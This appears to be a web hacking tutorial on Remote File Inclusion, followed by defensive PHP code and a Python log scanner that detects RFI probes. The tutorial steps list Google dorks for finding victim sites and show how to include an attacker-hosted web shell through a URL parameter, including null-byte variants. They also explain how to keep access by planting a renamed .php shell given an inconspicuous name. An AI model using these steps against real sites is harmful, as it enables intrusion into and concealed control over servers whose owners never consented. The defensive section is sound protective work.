NOTE: Hacking is an illegal activity, so don't try this on anyone. This tutorial is only for educational purposes. If you want to use this tutorial for malicious purposes, please stop reading.
RFI (Remote File Inclusion)
Denial of Service (DoS).
Attacks such as cross-site scripting (XSS).
Code execution on the web server.
Step 1: Find a vulnerable site. For this you will have to use Google dorks. Some of the dorks look like this:
inurl:/index.php?show=
inurl:/index.php?pg=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?site=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
Step 2: Test a given website for the vulnerability. After getting the list of websites from the Google search, we have to test each website for the vulnerability. To make this easier to understand, I will use an example: www.targetsite.com. Now we have to add the following keywords to it:
"index.php?page=www.google.com"
(without quotes)
And it will become like this:
www.targetsite.com/index.php?page=http://www.google.com
Hit Enter. If the executed page directs us to the Google homepage, then we can say that the website is vulnerable to attack.
Step 3: Exploitation of the vulnerability. After this we have to upload the shell to the target website. For this we have to take a few things into consideration: the shell must be in .txt format (shell.txt), like Locus. You can see the shell page and download shells from www.sh3ll.org. Once we have the shell, we have to upload it to a free hosting service, and after uploading the shell page becomes like this:
www.yourwebsite.com/shell.txt
After this we have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site:
www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt
Sometimes we have to use null bytes for it to execute successfully. If we receive an error from "shell.txt", then we have to try "shell.txt?".
If you have a web shell on the site, but want to make sure you still have access if the owner changes the PHP script, you could upload your shell to their site. Save the text file to your computer and rename it from .txt to .php, then simply upload it using the shell you already have on the site:
www.targetsite.com/index.php?page=www.yourwebsite.com/shell.txt
But be sure to name it something that is less obvious to the site owner than shell.php, so that it looks like it is part of the site. Look around at the names of the rest of the pages.
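Protect your website
Want to still use index.php?file= but make sure your site isn't vulnerable to RFI?
No problem, just use the "switch" statement (like this site uses) that defines the pages beforehand. The request parameter then only selects one of the file names written in the script, so a value supplied by the visitor is never passed to include() itself. The code is shown below: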
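<?php
// Only the fixed file names below are ever passed to include();
// the request value merely selects one of them.
$page = isset($_GET['page']) ? $_GET['page'] : '';
switch ($page) {
    case "page1":
        include("page1.php");
        break;
    case "page2":
        include("page2.php");
        break;
    default:
        // Any other value (the original listing is cut off here): include nothing.
        http_response_code(404);
        break;
}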
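To check whether your own site has already received requests like the ones in Step 2 and Step 3, you can scan the web server's access log for include-style parameters whose value is a URL or contains a null byte. The script below is an added example, not part of the original tutorial; the log lines are constructed, the combined log format is assumed, and the parameter names are the ones from the dork list above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names taken from the include-style URLs listed in Step 1.
INCLUDE_PARAMS = {"show", "pg", "pagina", "inc", "include_file", "page",
                  "site", "cat", "file", "path_local"}
# A value that begins with "scheme://" points at a remote resource.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Common/combined log format (assumed): client IP, quoted request line, status.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def find_rfi_probes(log_lines):
    """Return (client_ip, param, value, status) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded values
            if name.lower() not in INCLUDE_PARAMS:
                continue
            if REMOTE.match(value) or "\x00" in value:
                hits.append((ip, name, value, status))
    return hits

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] '
    '"GET /index.php?page=http://www.google.com HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Mar/2024:10:01:09 +0000] '
    '"GET /index.php?page=http%3A%2F%2Fexample.test%2Fx.txt%3F HTTP/1.1" 200 0',
    '198.51.100.4 - - [10/Mar/2024:10:02:00 +0000] '
    '"GET /index.php?page=page1 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Mar/2024:10:03:00 +0000] '
    '"GET /index.php?file=page2%00.jpg HTTP/1.1" 404 0',
    '198.51.100.4 - - [10/Mar/2024:10:04:00 +0000] '
    '"GET /search.php?q=http://example.test/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, name, value, status in find_rfi_probes(SAMPLE_LOG):
        print(f"{ip} {name}={value!r} -> HTTP {status}")
```

A hit answered with status 200 deserves a closer look at the script that handled it; with the switch statement above in place, such requests fall through to the default case.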
Legal Disclaimer: This tutorial is for educational purposes only. The author will not be held responsible for any misuse of this tutorial by any means.
If you have any queries, please comment on my posts.